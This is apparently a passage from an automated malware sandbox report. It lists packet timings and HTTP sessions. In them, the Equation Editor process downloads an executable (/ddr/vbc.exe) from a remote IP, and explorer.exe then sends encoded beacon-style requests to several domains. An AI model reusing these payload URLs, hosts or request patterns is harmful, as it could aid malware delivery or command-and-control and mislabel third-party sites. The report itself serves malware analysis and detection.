                                                                                      Sep 15, 2021 11:16:35.865576982 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865583897 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865596056 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865614891 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865619898 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865639925 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865652084 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865711927 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865722895 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865748882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865761042 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865771055 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865783930 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865804911 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865842104 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865870953 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865880966 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865904093 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865904093 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865923882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865947008 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:35.865950108 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865966082 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:35.865981102 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208302021 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208329916 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208345890 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208364010 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208420038 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208444118 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208453894 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208483934 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208484888 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208520889 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208523035 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208559036 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208580971 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208606958 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208616972 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208658934 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208678961 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208698988 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208702087 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208730936 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208765030 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208800077 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208802938 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208832026 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208833933 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208868027 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208872080 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208903074 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208908081 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.208940983 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.208980083 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209013939 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209019899 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209054947 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209055901 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209086895 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209089041 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209126949 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209145069 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209151030 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209156036 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209178925 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209183931 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209209919 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209213018 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209232092 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209243059 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209254026 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209266901 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209279060 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209286928 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209301949 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209322929 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209326029 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209336996 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209347010 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209352970 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209367990 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209382057 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209389925 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209408045 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209410906 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209418058 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209433079 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209450960 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209465027 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209470987 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209472895 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209485054 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209494114 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209510088 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209517002 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209523916 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209539890 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209551096 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209567070 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209590912 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209603071 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209608078 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209613085 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209630966 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209638119 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209654093 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209662914 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209667921 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209686041 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209712029 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209728003 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209734917 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209736109 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209753036 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209764004 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209794044 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209803104 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209819078 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209832907 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209842920 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209865093 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209866047 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209891081 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209893942 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209909916 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209927082 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209935904 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209948063 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209964037 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209973097 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.209995985 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.209996939 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210031986 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210047007 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210067034 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210069895 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210079908 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210092068 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210114002 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210114002 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210133076 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210135937 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210154057 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210165024 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210171938 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210177898 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210192919 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210202932 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210218906 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210227013 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210232973 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210253000 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210273981 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210289955 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210294962 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210298061 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210318089 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210333109 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210355043 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210376978 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210381031 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210397005 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210402012 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210407972 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210432053 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210439920 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210455894 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210464954 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210479975 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210489035 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210500956 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210510969 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210524082 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210536003 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210545063 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.210566044 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.210592985 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.211476088 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.211503029 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.211525917 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.211551905 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.211575985 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.211579084 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.211616993 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.211621046 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.211678982 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.211699963 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.212414980 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.220977068 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221045971 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221108913 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221157074 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221189976 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221199989 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221210957 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221232891 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221276045 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221299887 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221314907 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221327066 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221332073 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221335888 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221348047 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:20:30.778043032 CEST804918634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.476473093 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.496632099 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.497091055 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.497116089 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.516303062 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.612250090 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.612282038 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.612598896 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.612621069 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.928325891 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.947422028 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.699280977 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.718441963 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.718744993 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.718801022 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.737942934 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.833789110 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.833832026 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.834177017 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.834208965 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.857525110 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:53.918242931 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:53.937359095 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:53.937551975 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:53.937608004 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:53.956811905 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:54.053649902 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:54.053716898 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:54.054013968 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:54.054058075 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:54.073905945 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.051594973 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.159210920 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.159471035 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.159507036 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.268222094 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.269926071 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.270080090 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.270243883 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.270297050 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.377002954 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.278034925 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.295078993 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.295380116 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.295397043 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.312585115 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.410657883 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.410680056 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.410995007 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.411016941 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.714140892 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.732861042 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.410471916 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.429657936 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.429820061 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.429909945 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.449114084 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.545253038 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.545285940 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.545588970 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.545629025 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.846986055 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.866205931 CEST804920034.98.99.30192.168.2.22

                                                                                      UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class

                                                                                      HTTP Request Dependency Graph


                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 198.23.212.143 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:16:35.291671038 CEST | 0 | OUT | GET /ddr/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.23.212.143
Connection: Keep-Alive
Sep 15, 2021 11:16:35.411237955 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 16:16:33 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
Last-Modified: Wed, 15 Sep 2021 03:32:23 GMT
ETag: "87e00-5cc0058a7b386"
Accept-Ranges: bytes
Content-Length: 556544
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 192.99.131.252 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:17:59.820272923 CEST | 585 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
Host: www.americanstonesusa.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:17:59.929552078 CEST | 586 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 15 Sep 2021 09:17:59 GMT
Server: Apache
Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
Content-Length: 354
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.22 | 49185 | 34.98.99.30 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:20:20.496011972 CEST | 606 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
Host: www.realstyleworks.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:20:20.611011028 CEST | 607 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 15 Sep 2021 09:20:20 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139efab-113"
Via: 1.1 google
Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.22 | 49186 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:20:30.639823914 CEST | 607 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
Host: www.authorjameswshepherdonline.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:20:30.756135941 CEST | 608 | IN | HTTP/1.1 403 Forbidden
